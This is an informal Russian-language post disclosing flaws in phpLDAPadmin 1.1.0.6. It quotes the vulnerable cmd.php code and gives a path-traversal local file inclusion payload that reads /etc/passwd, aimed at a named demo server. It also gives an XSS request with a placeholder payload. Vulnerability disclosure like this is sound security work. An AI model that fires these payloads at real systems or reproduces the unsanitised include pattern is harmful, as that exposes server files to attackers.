Сайт: http://phpldapadmin.sourceforge.net/wiki/index.php/Main_Page Версия: 1.1.0.6 Тут пришлось настраивать на серваке ldap + samba. Гуглил, как это все делать. Наткнулся на статью, описывающую работу с phpLDAPadmin. Стянул тулзу с репозиториев. начал работать и чего-то захотелось сорцы покапать =) Файл: /usr/share/phpldapadmin/htdocs/cmd.php PHP: ... $www['cmd'] = get_request('cmd','REQUEST'); $www['meth'] = get_request('meth','REQUEST'); ob_start(); $file = ''; switch ($www['cmd']) { case '_debug' : debug_dump($_REQUEST,1); break; default : if (defined('HOOKSDIR') && file_exists(HOOKSDIR.$www['cmd'].'.php')) $file = HOOKSDIR.$www['cmd'].'.php'; elseif (defined('HTDOCDIR') && file_exists(HTDOCDIR.$www['cmd'].'.php')) $file = HTDOCDIR.$www['cmd'].'.php'; elseif (file_exists('welcome.php')) $file = 'welcome.php'; } if (DEBUG_ENABLED) debug_log('Ready to render page for command [%s,%s].',128,__FILE__,__LINE__,__METHOD__,$www['cmd'],$file); # Create page. $www['page'] = new page($ldapserver->server_id); if ($file) include $file; ... Тут и локальный инклюд: /cmd.php?cmd=../../../../../../../../etc/passwd%00 И XSS (нахера она правда нужна - хз, до кучи ): /cmd.php?cmd=_debug&a=[xss] Пример: http://wurley.demo.phpldapadmin.info/php5-RELEASE/cmd.php?cmd=../../../../../../../../etc/passwd%00 ps: Дальше особо не копал, тк шесть часов - пора и домой валить)
